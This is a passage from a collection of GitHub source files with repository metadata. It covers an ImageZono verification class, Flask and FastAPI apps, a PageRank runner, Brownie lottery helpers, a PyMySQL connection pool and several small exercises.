number of preeicates in the ImageZono'\n\n # check if all values of predicate variables are in [-1, 1]\n for i in range(obj.numPreds):\n if not (pred_val[i]<=1 and pred_val[i]>=-1):\n raise Exception('error: predicate values should be in the range of [-1, 1] for ImageZono')\n\n image = np.zeros((obj.numChannels, obj.height, obj.width))\n for i in range(obj.numChannels):\n image[i, :, :] = obj.V[1, i, :, :]\n for j in range(1, obj.numPreds + 1):\n image[i, :, :] = image[i, :, :] + pred_val[j-1] * obj.V[j, i, :, :]\n return image\n\n # affineMap of an ImageZono is another ImageZono\n # y = scale * x + offset\n def affineMap(obj, scale, offset):\n # @scale: scale coefficient [1 x 1 x NumChannels] array\n # @offset: offset coefficient [1 x 1 x NumChannels] array\n # return: a new ImageZono\n\n assert scale.size and not np.isscalar(scale) and scale.shape[0] == obj.numChannels, 'error: inconsistent number of channels between scale array and the ImageZono'\n \n if scale.size:\n new_V = scale * obj.V\n else:\n new_V = obj.V\n\n if offset.size:\n new_V[1, :, :, :] = new_V[1, :, :, :] + offset\n \n return ImageZono(new_V)\n\n # transform to Zono\n def toZono(obj):\n from engine.set.zono import Zono\n\n center = obj.V[1,:,:,:,]\n generators = obj.V[1:obj.numPreds + 1,:,:,:]\n\n center = center.reshape(-1, 1)\n generators = np.reshape(generators, (obj.height*obj.width*obj.numChannels, obj.numPreds))\n return Zono(center, generators)\n\n#------------------check if this function is working--------------------------------------------\n # transform to ImageStar\n def toImageStar(obj):\n from imagestar import ImageStar\n pred_lb = -np.ones((obj.numPreds, 1))\n pred_ub = np.ones((obj.numPreds, 1))\n\n C = np.hstack((np.eye(obj.numPreds), -np.eye(obj.numPreds))) \n d = np.hstack((pred_ub, -pred_lb))\n return ImageStar(obj.V, C, d, pred_lb, pred_ub, obj.lb_image, obj.ub_image)\n \n\n#------------------check if this function is working--------------------------------------------\n # contain, check if an ImageZono contain an image\n def contains(obj, image):\n # @image: input image\n # @bool = 1 if the ImageStar contain the image\n # 2 if the ImageStar does not contain the image\n\n n = image.shape\n if len(n) == 2: # one channel image\n assert obj.numChannels == 1 and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n elif len(n) == 3:\n assert n[0] == obj.numChannels and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n else:\n raise Exception('error: invalid input image')\n\n Z = obj.toZono()\n return Z.contains(y)\n\n # get Ranges\n def getRanges(obj):\n return [obj.lb_image, obj.ub_image]\n\n#------------------check if this function is working--------------------------------------------\n def is_p1_larger_p2(obj, p1, p2):\n # @p1: the first point = []\n # @p2: the second point = []\n # h: height, w: width, c: channel index\n\n # @b = 1 -> p1 > p2 is feasible\n # = 0 -> p1 > p2 is infeasible\n\n S = obj.toImageStar\n return S.is_p1_larger_p2(p1, p2)\n \n def __str__(obj):\n print('class: %s' % (obj.__class__))\n print('height: %s \\nwidth: %s' % (obj.height, obj.width))\n print('lb_image: [%sx%sx%s %s]' % (obj.lb_image.shape[0], obj.lb_image.shape[1], obj.lb_image.shape[2], obj.lb_image.dtype))\n print('ub_image: [%sx%sx%s %s]' % (obj.ub_image.shape[0], obj.ub_image.shape[1], obj.ub_image.shape[2], obj.ub_image.dtype))\n if len(obj.V.shape) == 4:\n print('V: [%sx%sx%sx%s %s]' % (obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.shape[3], obj.V.dtype))\n else:\n print('V: [%sx%sx%s %s]' % (obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.dtype))\n return 'numPreds: %s\\n' % (obj.numPreds)\n \n def __repr__(obj):\n return \"class: %s \\nnumChannels: %s\\nheight: %s\\nwidth: %s\\nlb_image:\\n%s\\nub_image: \\n%s\\nV: \\n%s\\nnumPred: %s\" % (obj.__class__, obj.numChannels, obj.height, obj.width, obj.lb_image, obj.ub_image, obj.V, obj.numPreds)\n\n\n\n\n","repo_name":"V2A2/StarV_temp","sub_path":"engine/set/imagezono/imagezono.py","file_name":"imagezono.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18950976005","text":"##\n## EPITECH PROJECT, 2021\n## 109titration\n## File description:\n## main\n##\n\nimport sys\nfrom utils import *\nfrom calc import *\n\ndef titration(data):\n\tderive = calc_deriv(data)\n\tcalc_deriv_bis(derive, data)\n\tcalc_deriv_bis_estimation(derive, data)\n\ndef main():\n\tcheck_arguments()\n\tdata = load_csv_file()\n\ttitration(data)","repo_name":"Xantass/Project-Epitech","sub_path":"Semester_2/109titration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7686272889","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext as _\nfrom admin_tools.menu import items\nfrom jmb.core.admin.menu import register_menu\n\ncurrency_menu_item = items.MenuItem(\n _('project'),\n reverse('admin:app_list', kwargs={'app_label': 'project'}),\n children=[\n items.MenuItem(_('add project'), reverse('admin:project_project_add', )),\n items.MenuItem(_('list project'), reverse('admin:project_project_changelist', )),\n items.MenuItem(_('add task'), reverse('admin:project_task_add', )),\n items.MenuItem(_('list task'), reverse('admin:project_task_changelist', )),\n ]\n)\n\nregister_menu(currency_menu_item, 'project')\n","repo_name":"monkeybits/edilcloud-back","sub_path":"apps/project/jmenu.py","file_name":"jmenu.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29052582314","text":"# 숫자가 쓰인 카드들이 N x M 형태로 놓여 있다. N은 행의 개수, M은 열의 개수\n# 먼저 뽑고자 하는 카드의 행 선택\n# 그 다음 선택된 행에 포함된 카드 중 가장 낮은 카드 뽑음\n# 처음 카드를 골라낼 행을 선택할 때, 이후에 해당 행에서 가장 숫자가 낮은 카드를 뽑을 것을 고려하여 최종적으로 가장 높은 숫자의 카드를 뽑을 수 있도록 전략 세움\n# 카드에 적힌 숫자는 1 이상 10,000 이하의 자연수\n# 행의 개수 N과 열의 개수 M이 공백을 기준으로 하여 각각 자연수로 주어짐(1 <= N, M <= 100)\n\nn, m = list(map(int, input().split()))\n\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input().split()))\n min_value = min(data)\n result = max(result, min_value)\n\nprint(result)\n","repo_name":"ImWonYong/TIL","sub_path":"Algorithm/Greedy/3-3.py","file_name":"3-3.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"35782801024","text":"from flask import Flask, render_template, request\r\nfrom openpyxl import load_workbook, Workbook\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\n\r\n# Function to create or load the Excel file\r\ndef get_workbook():\r\n try:\r\n workbook = load_workbook(\"user_data.xlsx\")\r\n except FileNotFoundError:\r\n workbook = Workbook()\r\n sheet = workbook.active\r\n sheet.append([\"Name\", \"Email\", \"Employ Code\", \"Optical Message\", \"Date and Time\"])\r\n return workbook\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n name = request.form.get('name')\r\n email = request.form.get('email')\r\n emp_code = request.form.get('empCode')\r\n optical_message = request.form.get('opticalMessage')\r\n \r\n # Add the current date and time\r\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n\r\n workbook = get_workbook()\r\n sheet = workbook.active\r\n\r\n # Add the submitted data along with the timestamp to the Excel file\r\n sheet.append([name, email, emp_code, optical_message, timestamp])\r\n\r\n # Save the Excel file\r\n excel_file_name = \"user_data.xlsx\"\r\n workbook.save(excel_file_name)\r\n\r\n return render_template('index.html', message=\"Data saved successfully!\")\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"ImShehan/UserDataApplication","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34613178159","text":"from redis import Redis\n\nclient = Redis()\nprint(client.ping())\nif client.ping():\n print(1111111111)\n\n\na = [2,3,4, 123,333, 1]\nb = (1,2,3,4,5)\nprint(zip(a, b))\na = list(zip(a, b))\nprint(a)\n\na = '2020-01-01 02:02:00'\nimport datetime\na = datetime.datetime.strptime(a, '%Y-%m-%d %X')\nprint(a)\nb = a + datetime.timedelta(hours=8)\nprint(b)\n\n\n","repo_name":"281234086/data_struct","sub_path":"redis_study/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28863125662","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\n\nw = cap.get(cv2.CAP_PROP_FRAME_WIDTH);\nh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT); \nout = cv2.VideoWriter('output.avi', fourcc, 15.0, (int(w),int(h)))\n\n\nwhile True:\n\tret, frame = cap.read()\n\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tout.write(frame)\n\n\tcv2.imshow('frame',frame)\n\tcv2.imshow('gray',gray)\n\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\n\ncap.release()\nout.release()\ncv2.destroyAllWindows()","repo_name":"LatentFreedom/ShoulderSurfingDetection","sub_path":"OpenCV_Exercises/VideoInput.py","file_name":"VideoInput.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25207267707","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom process import main\n\nclass Generator_card_Shuffle(ttk.Frame):\n # default\n name_file_to_count = 'A'\n\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n file_to_count = tk.StringVar()\n\n self.label_file_to_count = ttk.Label(self, text='Counting Flop Pattern')\n self.label_file_to_count.grid(row=0, column=0, columnspan=4, sticky='N',pady=15)\n self.label_name_file_to_count = ttk.Label(self, text=\"Name file to count:\")\n self.label_name_file_to_count.grid(row=1, column=0, sticky=tk.W)\n self.entry_number_of_rows = ttk.Entry(self, width=10, textvariable=file_to_count)\n self.entry_number_of_rows.grid(row=1, column=1, sticky=tk.W, padx=5)\n\n self.button_counting = ttk.Button(self, text=\"Counting\", command=self.counting)\n self.button_counting.grid(row=4, column=0, columnspan=4, pady=20, sticky=\"N\")\n\n self.name_file_to_count = file_to_count.get()\n\n option_list = ('Count_All','Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)')\n self.option_menu = ttk\n value = tk.StringVar(self)\n value.set('เลือก Option')\n self.option_menu = tk.OptionMenu(self, value, *option_list)\n self.option_menu.config(width=10)\n self.option_menu.grid(row=2, column=0, columnspan=2, pady=5, sticky=\"N\")\n self.value = value\n\n def get_option(self):\n return self.value.get()\n\n\n def counting(self):\n self.name_file_to_count = self.entry_number_of_rows.get()\n if self.get_option() == 'Count_All':\n main(self.name_file_to_count,['Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)'])\n else:\n main(self.name_file_to_count,[self.get_option()])\n self.popup()\n\n def popup(self):\n self.popup_window = tk.Toplevel()\n self.popup_window.title(\"Done!\")\n self.popup_window.geometry(\"150x50\")\n self.popup_window.resizable(False, False)\n self.popup_window.wm_attributes(\"-topmost\", 1)\n self.button_counting = ttk.Button(self.popup_window, text=\"OK\", command=self.popup_window.destroy)\n self.button_counting.grid(row=3, column=0, columnspan=4, pady=20, sticky=\"N\")\n self.button_counting.pack()\n\n\n\n\nif __name__ == \"__main__\":\n app = tk.Tk()\n app.title(\"Flop Counting\")\n app.geometry(\"250x170\")\n app = Generator_card_Shuffle(master=app)\n app.mainloop()\n","repo_name":"JamesAsuraA93/Excel_main","sub_path":"counting/app_counting.py","file_name":"app_counting.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11284933362","text":"from fastapi import FastAPI, File, HTTPException\n\n# Please see https://dhali.io/docs/#/ for more info\n\n# \n\napp = FastAPI()\n\n# \n\n@app.put(\"/run/\")\nasync def infer(input: bytes = File()):\n\n try:\n # You must extract the input to the model from `input`.\n #\n # If `input` is a text string:\n # text=input.decode(\"utf-8\")\n #\n # If `input` is a json object:\n # import json\n # json_input = json.loads(input.decode(\"utf-8\"))\n #\n # If `input` is an image:\n # from PIL import Image\n # image = Image.open(io.BytesIO(input))\n #\n # If `input` is an image base64 embedded into a json:\n # import json\n # import base64\n # json_input = json.loads(input.decode(\"utf-8\"))\n # img_data = json_input[\"image\"].encode()\n # content = base64.b64decode(img_data)\n #\n # \n # \n # \n #\n # The format of the result can be anything returnable from a FastAPI\n # endpoint. E.g.:\n\n return {\"results\": \"CALCULATED RESULT\"}\n \n except Exception as e:\n raise HTTPException(422, f\"Your input could not be parsed: {e}\")\n","repo_name":"Dhali-org/Dhali-asset-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41307310409","text":"import argparse\nfrom songs import get_songs, extract_details\nfrom matches import matches \nfrom playlist import extract_id_from_uri\nimport json\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Use a query string to search a list of spotify playlists')\n\n parser.add_argument('--playlist', \"-p\", help=\"spotify playlist URI\", required=True, action=\"append\")\n parser.add_argument('--query', \"-q\", help=\"query string\", required=True)\n parser.add_argument('--verbose', \"-v\", help=\"verbose output\", action=\"store_false\", default=False)\n return parser.parse_args()\n\ndef build_url(uri):\n return \"https://open.spotify.com/playlist/\" + extract_id_from_uri(uri)\n\ndef run():\n args = get_args()\n urls = [build_url(uri) for uri in args.playlist]\n songs = [song for url in urls for song in get_songs(url)]\n\n matched_songs = matches(args.query, songs)\n if args.verbose:\n print(json.dumps(matched_songs))\n else:\n print(json.dumps([extract_details(song) for song in matched_songs]))\n\nif __name__ == \"__main__\":\n run()","repo_name":"dandandy/spotplaylist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20889295813","text":"#!/usr/bin/env python3\n\nimport os, sys, json\nimport pandas as pd\nimport numpy as np\nfrom pyvis.network import Network\n\n\ndef run_PageRank(filein):\n \"\"\"Run PageRank.py and create a file to save results.\n\n Args:\n filein (str): File path of a file fotmated as follow :\n fromNode\\ttoNode\\n\n fromNode\\ttoNode\\n\n etc\n \"\"\" \n os.system(f\"python PageRank.py {filein} > {os.path.join('output','results.txt')}\")\n\ndef convert_results_txt2json():\n \"\"\"Convert results.txt (created by run_PageRank function) to json format.\n \"\"\" \n with open(os.path.join('output','results.txt'), \"r\") as filein:\n with open(os.path.join('output','results.json'), \"w\") as fileout:\n fileout.write(\"[\")\n for line in filein:\n fileout.write(\"{\" + line.strip().replace(\"\\t\", \":\") + \"},\\n\")\n fileout.write('{\"-1\" : {\"rank\":0.0,\"AdjacencyList\":[]}}\\n]')\n\ndef get_rank_df():\n \"\"\"Create Dataframe : rank = pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \"\"\"\n id = []\n pagerank = []\n redirect_list = []\n with open(os.path.join('output','results.json'), \"r\") as f:\n results = json.load(f)\n for elm in results:\n id.append(int(list(elm.keys())[0]))\n pagerank.append(list(elm.values())[0][\"rank\"])\n redirect_list.append(list(elm.values())[0][\"AdjacencyList\"])\n return pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \ndef get_net_df():\n \"\"\"Create Dataframe : net = pd.DataFrame({\"source\":source, \"target\":target})\n \"\"\"\n source = []\n target = []\n with open(filein, \"r\") as f:\n for line in f:\n line = line.strip().split('\\t')\n source.append(int(line[0]))\n target.append(int(line[1]))\n return pd.DataFrame({\"source\":source, \"target\":target})\n\ndef get_topn_df(rank, net, n):\n \"\"\"Get Top n sort by pagerank from net DataFrame\n \"\"\"\n topn = rank[[\"id\", \"pagerank\"]].sort_values(by=\"pagerank\", ascending=False)[:n]\n print(f\"\\nTop {n} nodes :\\n\", topn)\n return net[net.source.isin(topn.id)].astype(str)\n \ndef visualization(net_topn) :\n network = Network(height='1000px', width='100%', bgcolor='#222222', font_color='white')\n network.barnes_hut()\n \n sources = net_topn.source\n targets = net_topn.target\n weights = np.ones(len(net_topn))\n for src, dst, w in zip(sources, targets, weights):\n network.add_node(src, src, title=src)\n network.add_node(dst, dst, title=dst)\n network.add_edge(src, dst, value=w)\n\n neighbor_map = network.get_adj_list()\n\n # add neighbor data to node hover data\n for node in network.nodes:\n node['value'] = len(neighbor_map[node['id']]) * 100\n\n network.show_buttons(filter_=['physics'])\n network.show(os.path.join('output','network.html'))\n \n \nif __name__==\"__main__\":\n \n if len(sys.argv)<2:\n raise Exception(\"Missing arguments\")\n filein = sys.argv[1]\n \n os.makedirs('output', exist_ok = True)\n if not os.path.isfile(os.path.join('output','results.txt')):\n print('run')\n run_PageRank(filein)\n if not os.path.isfile(os.path.join('output','results.json')):\n convert_results_txt2json()\n \n # Get top n\n rank = get_rank_df()\n net = get_net_df()\n net_topn = get_topn_df(rank, net, 5)\n\n # Visualization\n visualization(net_topn)\n","repo_name":"amait41/pagerank","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11567243425","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n if not my_list:\n return 0\n\n weight = 0\n score = 0\n for pair in my_list:\n a, b = pair\n score += a * b\n weight += b\n return score / weight\n","repo_name":"Ella711/holbertonschool-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33339250689","text":"from flask import Blueprint, render_template, abort, Flask, request, send_from_directory\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport json\nfrom flask.ext.jsonpify import jsonify\n\nbadge = Flask(__name__)\nbadge.config.from_object('badges.config')\ndb = SQLAlchemy(badge)\nfrom badges import models\nfrom badges.models import *\nbadges = Blueprint('badges', 'badges')\n\n#========= The above part will be more or less the same for all GDE =======#\n\n#========================= Non-route functions ============================#\n\ndef add_user(username):\n me = User(username)\n db.session.add(me)\n db.session.commit()\n return\n\ndef find_user_force(username):\n user = User.query.filter_by(nickname=username).first()\n if user is None:\n add_user(username)\n user = User.query.filter_by(nickname=username).first()\n return user\n\ndef find_badge(name):\n badge = Badge.query.filter_by(name=name).first()\n return badge\n\ndef delete_all_users(username):\n users = User.query.all()\n for user in users:\n db.session.delete(user)\n db.session.commit()\n\n#========================= Routes are defined below =======================#\n\n@badges.route('/', defaults={'page': 'index'})\ndef module_name(page):\n return 'Badges module'\n\n@badges.route('/users', methods=[\"GET\"])\ndef show_all_users():\n users = User.query.all()\n data = []\n for user in users:\n data.append({\n 'id': user.id,\n 'name': user.nickname\n })\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n@badges.route('/user/', methods=[\"GET\"])\ndef show_user(page):\n user = User.query.filter_by(nickname=page).first()\n badge_ids = UserBadge.query.filter_by(user_id=user.id)\n badges = []\n for b in badge_ids:\n badge = Badge.query.filter_by(id=b.badge_id).first()\n badges.append(badge.to_dict())\n data = ({\n 'id': user.id,\n 'name': user.nickname,\n 'badges': badges\n })\n return jsonify({\n 'success': True,\n 'message': 'User exist',\n 'data': data\n })\n\n@badges.route('/create', methods=[\"POST\"])\ndef create_badge():\n try:\n badge = Badge(request.form['name'], request.form['description'], request.form['image_name'])\n db.session.add(badge)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 'Badge added successfully'\n })\n\n@badges.route('/list', methods=[\"GET\"])\ndef show_all_badges():\n badges = Badge.query.all()\n data = []\n for badge in badges:\n data.append(badge.to_dict())\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n\n@badges.route('/award', methods=[\"POST\"])\ndef create_badge_user_mapping():\n try:\n user = find_user_force(request.form['username'])\n badge = find_badge(request.form['badge'])\n existing = UserBadge.query.filter_by(user_id=user.id, badge_id=badge.id).all()\n if len(existing) > 0:\n return jsonify({\n 'success': False,\n 'message': 'User already has this badge'\n })\n mapping = UserBadge(user, badge)\n db.session.add(mapping)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 'Badge awarded successfully'\n })\n\n@badges.route('/static/', methods=[\"GET\"])\ndef send_static(page):\n return send_from_directory('badges/static', page)","repo_name":"IIITSERC/SE_2016_GDE","sub_path":"srcGDE/badges/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73102548329","text":"from brownie import(\n accounts,\n network,\n config,\n MockV3Aggregator,\n VRFCoordinatorMock,\n LinkToken,\n Contract,\n interface\n)\n\nDECIMALS = 18\nINITIALANSWER = 200000000000\n\nFORKED_ENVS = [\"mainnet-fork\", \"mainnet-fork-dev\"]\nLOCAL_DEVELOPMENT_ENVS = [\"development\", \"Ganache-local\"]\n\ncontract_to_mock = {\n \"eth_usd_price_feed\": MockV3Aggregator,\n \"vrf_coordinator\": VRFCoordinatorMock,\n \"link_token\": LinkToken,\n}\n\ndef get_account(index=None, id=None):\n if index:\n return accounts[index]\n if id:\n return accounts.load(id)\n if (\n network.show_active() in LOCAL_DEVELOPMENT_ENVS\n or network.show_active() in FORKED_ENVS\n ):\n return accounts[0]\n # if nothing above 3 statmens is true the below one will be done\n return accounts.add(config[\"Wallets\"][\"from_key\"])\n\ndef get_contract(contract_name):\n contract_type = contract_to_mock[contract_name]\n if network.show_active() in LOCAL_DEVELOPMENT_ENVS:\n if len(contract_type) <= 0:\n deploy_mock()\n contract = contract_type[-1]\n else:\n contract_address = config[\"networks\"][network.show_active()][contract_name]\n contract = Contract.from_abi(\n contract_type._name, contract_address, contract_type.abi\n )\n return contract\n\ndef deploy_mock():\n \n adbhut_print(f\"active network is {network.show_active()}\",\"=\")\n adbhut_print(\"Deploying MOCKS.....!!\",\"?\")\n MockV3Aggregator.deploy(\n DECIMALS, # Parameter that constructor takes this is _decimals\n INITIALANSWER, # Parameter that constructor takes _initialAnswer\n {\"from\": get_account()}, # since it is state change type\n )\n link_token = LinkToken.deploy({\"from\": get_account()})#deploying contract of link token\n VRFCoordinatorMock.deploy(link_token.address,{\"from\":get_account()})\n #deploying contract of VRFCoordinatorMock, tales link token address as input to contract \n adbhut_print(\"|||||||mock deployed|||||||\",\"=\")\n\ndef fund_with_link(\n contract_address, account=None, link_token=None, amount=100000000000000000\n): # 0.1 LINK\n account = account if account else get_account()\n link_token = link_token if link_token else get_contract(\"link_token\")\n tx = link_token.transfer(contract_address, amount, {\"from\": account})\n #OR\n # link_token_contract = interface.LinkTokenInterface(link_token.address)\n # tx = link_token_contract.transfer(contract_address, amount, {\"from\": account})\n #before doing this make sure to copy pasete the link token interface file into your interfaces folder\n tx.wait(1)\n adbhut_print(\"Contract Funded!\")\n return tx\n\ndef adbhut_print(input_str,second_char=\"=\"):\n char_pairs=int((len(input_str))/2)\n if (len(input_str))%2==0:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}\\n{input_str}\\n{char_len}\")\n else:\n char_len=(\"=\"+second_char)*char_pairs\n print(f\"{char_len}=\\n{input_str}\\n{char_len}=\")\n\n","repo_name":"KingSlayer-KS/SmartContract-LOTTERY","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43408240805","text":"import logging\nimport threading\nimport contextlib\n\nfrom pymysql.connections import Connection\nfrom pymysql.cursors import DictCursor, Cursor\n\nfrom .pool import PoolContainer, PoolIsFullException, PoolIsEmptyException\n\nlogger = logging.getLogger('pymysqlpool')\n\n__all__ = ['MySQLConnectionPool']\n\n\nclass NoFreeConnectionFoundError(Exception):\n pass\n\n\nclass PoolBoundaryExceedsError(Exception):\n pass\n\n\nclass MySQLConnectionPool(object):\n\n def __init__(self, pool_name, host=None, user=None, password=\"\", database=None, port=3306,\n charset='utf8', use_dict_cursor=True, max_pool_size=30,\n enable_auto_resize=True, auto_resize_scale=1.5,\n pool_resize_boundary=48,\n defer_connect_pool=False, **kwargs):\n\n \"\"\"\n 初始化连接池.\n :param pool_name: 连接池的队列名.\n :param host: 数据库host\n :param user: 数据库用户名\n :param password: 数据库密码\n :param database: 数据库名\n :param port: 数据库端口\n :param charset: 数据库编码\n :param use_dict_cursor: 是否使用dict游标\n :param max_pool_size: 最大连接数\n :param enable_auto_resize: 是否允许动态更改最大连接数\n :param pool_resize_boundary: 设置数据库允许的最大连接\n :param auto_resize_scale: 连接池动态更改最大比例\n :param kwargs: 其他`pymysql.Connection`配置项\n \"\"\"\n # 数据库连接配置\n self._host = host\n self._user = user\n self._password = password\n self._database = database\n self._port = port\n self._charset = charset\n self._cursor_class = DictCursor if use_dict_cursor else Cursor\n self._other_kwargs = kwargs\n\n # 数据库连接池配置\n self._pool_name = pool_name\n self._max_pool_size = max_pool_size if max_pool_size < pool_resize_boundary else pool_resize_boundary\n self._enable_auto_resize = enable_auto_resize\n self._pool_resize_boundary = pool_resize_boundary\n if auto_resize_scale < 1:\n raise ValueError(\n \"Invalid scale {}, must be bigger than 1\".format(auto_resize_scale))\n\n self._auto_resize_scale = int(round(auto_resize_scale, 0))\n self._pool_container = PoolContainer(self._max_pool_size)\n\n self.__safe_lock = threading.RLock()\n self.__is_killed = False\n self.__is_connected = False\n\n if not defer_connect_pool:\n self.connect()\n\n def __repr__(self):\n return ''.format(self.pool_name, self.size)\n\n def __del__(self):\n self.close()\n\n def __iter__(self):\n return iter(self._pool_container)\n\n @property\n def pool_name(self):\n return self._pool_name\n\n @property\n def pool_size(self):\n return self._pool_container.pool_size\n\n @property\n def free_size(self):\n return self._pool_container.free_size\n\n @property\n def size(self):\n return ''.format(self._pool_resize_boundary,\n self._max_pool_size,\n self.pool_size,\n self.free_size)\n\n @contextlib.contextmanager\n def cursor(self, cursor=None):\n with self.connection(True) as conn:\n assert isinstance(conn, Connection)\n cursor = conn.cursor(cursor)\n\n try:\n yield cursor\n except Exception as err:\n conn.rollback()\n raise err\n finally:\n cursor.close()\n\n @contextlib.contextmanager\n def connection(self, autocommit=False):\n conn = self.borrow_connection()\n assert isinstance(conn, Connection)\n old_value = conn.get_autocommit()\n conn.autocommit(autocommit)\n try:\n yield conn\n except Exception as err:\n # logger.error(err, exc_info=True)\n raise err\n finally:\n conn.autocommit(old_value)\n self.return_connection(conn)\n\n def connect(self):\n \"\"\"\n 启动连接池\n \"\"\"\n if self.__is_connected:\n return\n\n logger.info('[{}] Connect to connection pool'.format(self))\n\n test_conn = self._create_connection()\n try:\n test_conn.ping()\n except Exception as err:\n raise err\n else:\n with self.__safe_lock:\n self.__is_connected = True\n\n self._adjust_connection_pool()\n finally:\n test_conn.close()\n\n def close(self):\n \"\"\"\n 关闭连接池\n \"\"\"\n try:\n logger.info('[{}] Close connection pool'.format(self))\n except Exception:\n pass\n\n with self.__safe_lock:\n if self.__is_killed is True:\n return True\n\n self._free()\n\n with self.__safe_lock:\n self.__is_killed = True\n\n def borrow_connection(self):\n \"\"\"\n 从连接池中获取一个连接\n \"\"\"\n block = True\n\n while True:\n conn = self._borrow(block)\n if conn is None:\n block = not self._adjust_connection_pool()\n else:\n return conn\n\n def _borrow(self, block):\n try:\n connection = self._pool_container.get(block, None)\n except PoolIsEmptyException:\n return None\n else:\n # 检查连接是否还存活\n connection.ping(reconnect=True)\n return connection\n\n def return_connection(self, connection):\n \"\"\"\n 将使用完连接放回��接池\n \"\"\"\n return self._pool_container.return_(connection)\n\n def _adjust_connection_pool(self):\n \"\"\"\n 动态调整连接池大小.\n \"\"\"\n # 创建几个新连接\n logger.debug('[{}] Adjust connection pool, '\n 'current size is \"{}\"'.format(self, self.size))\n\n if self.pool_size >= self._max_pool_size:\n if self._enable_auto_resize:\n self._adjust_max_pool_size()\n\n try:\n connection = self._create_connection()\n except Exception as err:\n logger.error(err)\n return False\n else:\n try:\n self._pool_container.add(connection)\n except PoolIsFullException:\n logger.debug('[{}] Connection pool is full now'.format(self.pool_name))\n return False\n else:\n return True\n\n def _adjust_max_pool_size(self):\n with self.__safe_lock:\n self._max_pool_size *= self._auto_resize_scale\n if self._max_pool_size > self._pool_resize_boundary:\n self._max_pool_size = self._pool_resize_boundary\n logger.debug('[{}] Max pool size adjusted to {}'.format(self, self._max_pool_size))\n self._pool_container.max_pool_size 